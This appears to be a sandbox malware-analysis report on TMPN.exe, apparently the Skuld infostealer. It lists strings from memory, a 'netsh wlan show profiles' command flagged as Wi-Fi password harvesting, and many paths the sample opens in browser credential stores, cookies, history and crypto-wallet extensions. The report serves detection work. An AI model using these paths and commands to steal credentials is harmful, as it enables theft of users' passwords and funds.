Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: \Ethereum\keystore%s\extensions-tempreflect.Value.UintGetExitCodeProcesssegmentation faultoperation canceledno child processesconnection refusedRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFileMappingWGetFileAttributesWSetFileAttributesWCommandLineToArgvWunknown _txlock %qnon-minimal lengthtruncated sequencesequence truncatedcannot be negativeexceeded max depthinvalid character in numeric literalcontext.Backgroundunsupported formatbufio: buffer fullreceived from peerFLOW_CONTROL_ERRORframe_goaway_shortproxy-authenticateUNKNOWN_SETTING_%dGo-http-client/2.0Go-http-client/1.1Temporary RedirectPermanent RedirectMethod Not AllowedExpectation Failedbad Content-LengthIBM Code Page 1047IBM Code Page 1140Macintosh Cyrillicvalue out of range298023223876953125GetPerformanceInfoCM_MapCrToWin32ErrCloseServiceHandleCreateWellKnownSidGetSidSubAuthorityMakeSelfRelativeSDQueryServiceStatusCertGetNameStringWPFXImportCertStoreGetBestInterfaceExClosePseudoConsoleEscapeCommFunctionGetCommModemStatusGetComputerNameExWGetCurrentThreadIdGetModuleFileNameWGetModuleHandleExWGetVolumePathNameWRemoveDllDirectoryTerminateJobObjectWriteProcessMemoryEnumProcessModulesGetModuleBaseNameWreflect.Value.Elemreflect.Value.Typereflect: Zero(nil)dontfreezetheworldtracebackancestorsadaptivestackstarttraceadvanceperiodgarbage collectionsync.RWMutex.RLockGC worker (active)stopping the worldbad lfnode addresssystem page size (elem align too big but memory size /gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preempt
Source: TMPN.exe	String found in binary or memory: github.com/hackirby/skuld/modules/walletsinjection.ExodusInjection
Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: %s profiles/invitesBytecoinEthereumElectrum%s\%s\%sCoinbaseCrocobitMetamaskStarcoinProgramsapp.asarGoStringFullPathno anodeCancelIoReadFileAcceptExWSAIoctlshutdownfile[%d]usernameicon_url%s:%d:%sbad instkernel32hijackedNO_ERRORPRIORITYSETTINGSLocation data=%q incr=%v ping=%qif-matchlocationhttp/1.1HTTP/2.0HTTP/1.1no-cacheContinueAcceptedConflict48828125infinitystrconv.parsing ParseIntcompressEqualSidSetEventIsWindowrecvfromnil PoolscavengepollDesctraceBufdeadlockraceFinipanicnilcgocheckrunnable procid rax rbx rcx rdx rdi rsi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 rip rflags cs fs gs is not pointer packed=BAD RANK status unknown(trigger= npages= nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes wsaioctlThursdaySaturdayFebruaryNovemberDecember%!Month(ZONEINFOArmenianBalineseBopomofoBugineseCherokeeCyrillicDuployanEthiopicGeorgianGujaratiGurmukhiHiraganaJavaneseKatakanaKayah_LiLinear_ALinear_BMahajaniOl_ChikiPhags_PaTagbanwaTai_ThamTai_VietTifinaghUgariticVithkuqi[::1]:53continue_gatewayinvalid address readfromunixgram
Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: invalid escape sequenceunsupported certificateno application protocolCLIENT_TRAFFIC_SECRET_0SERVER_TRAFFIC_SECRET_0QUICEncryptionLevel(%v)varint integer overflowpattern bits too long: too many pointers (>10)segment length too longunpacking Question.Nameunpacking Question.Typeskipping Question Classflate: internal error: invalid PrintableStringx509: malformed UTCTimex509: invalid key usagex509: malformed versionVariantTimeToSystemTimeSafeArrayCreateVectorExP224 point not on curveP256 point not on curveP384 point not on curveP521 point not on curveinvalid scalar encodingGetWindowThreadProcessId-EnableNetworkProtection\Coinomi\Coinomi\walletsfloating point exceptionconnection reset by peerlevel 2 not synchronizedlink number out of rangeout of streams resourcesfunction not implementedstructure needs cleaningnot supported by windowsCertFreeCertificateChainCreateToolhelp32SnapshotGetUserProfileDirectoryWGetProcessImageFileNameWexec: Stdout already setskuld - made by hackirbyjson: unsupported type: RegisterClipboardFormatAinvalid argument to Intnunexpected buffer len=%vinvalid pseudo-header %qframe_headers_prio_shortinvalid request :path %qread_frame_conn_error_%sapplication/octet-streamRequest Entity Too Largehttp: nil Request.Header116415321826934814453125582076609134674072265625AllocateAndInitializeSidBuildSecurityDescriptorWAssignProcessToJobObjectGenerateConsoleCtrlEventGetMaximumProcessorCountGetNamedPipeHandleStateWSetConsoleCursorPositionSetDefaultDllDirectoriesNtQuerySystemInformationSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDevicehash of unhashable type span has no free objectsruntime: found obj at *(runtime: VirtualFree of /cgo/go-to-c-calls:calls/gc/heap/objects:objects/sched/latencies:secondsqueuefinalizer during GCupdate during transitionruntime: markroot index can't scan our own stackgcDrainN phase incorrectpageAlloc: out of memoryruntime: p.searchAddr = range partially overlapsstack trace unavailable
Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: \Ethereum\keystore%s\extensions-tempreflect.Value.UintGetExitCodeProcesssegmentation faultoperation canceledno child processesconnection refusedRFS specific erroridentifier removedinput/output errormultihop attemptedfile name too longno locks availablestreams pipe errorLookupAccountNameWCreateFileMappingWGetFileAttributesWSetFileAttributesWCommandLineToArgvWunknown _txlock %qnon-minimal lengthtruncated sequencesequence truncatedcannot be negativeexceeded max depthinvalid character in numeric literalcontext.Backgroundunsupported formatbufio: buffer fullreceived from peerFLOW_CONTROL_ERRORframe_goaway_shortproxy-authenticateUNKNOWN_SETTING_%dGo-http-client/2.0Go-http-client/1.1Temporary RedirectPermanent RedirectMethod Not AllowedExpectation Failedbad Content-LengthIBM Code Page 1047IBM Code Page 1140Macintosh Cyrillicvalue out of range298023223876953125GetPerformanceInfoCM_MapCrToWin32ErrCloseServiceHandleCreateWellKnownSidGetSidSubAuthorityMakeSelfRelativeSDQueryServiceStatusCertGetNameStringWPFXImportCertStoreGetBestInterfaceExClosePseudoConsoleEscapeCommFunctionGetCommModemStatusGetComputerNameExWGetCurrentThreadIdGetModuleFileNameWGetModuleHandleExWGetVolumePathNameWRemoveDllDirectoryTerminateJobObjectWriteProcessMemoryEnumProcessModulesGetModuleBaseNameWreflect.Value.Elemreflect.Value.Typereflect: Zero(nil)dontfreezetheworldtracebackancestorsadaptivestackstarttraceadvanceperiodgarbage collectionsync.RWMutex.RLockGC worker (active)stopping the worldbad lfnode addresssystem page size (elem align too big but memory size /gc/pauses:seconds because dotdotdotruntime: npages = runtime: range = {index out of rangeruntime: gp: gp=runtime: getg: g=forEachP: not done in async preempt

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkecke	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jblndlipeogpafnldhgmapagcccfchpi	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgog	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes\events	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfk	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgo	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofo	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\bookmarkbackups	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\crashes	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmalo	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii	Jump to behavior
Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
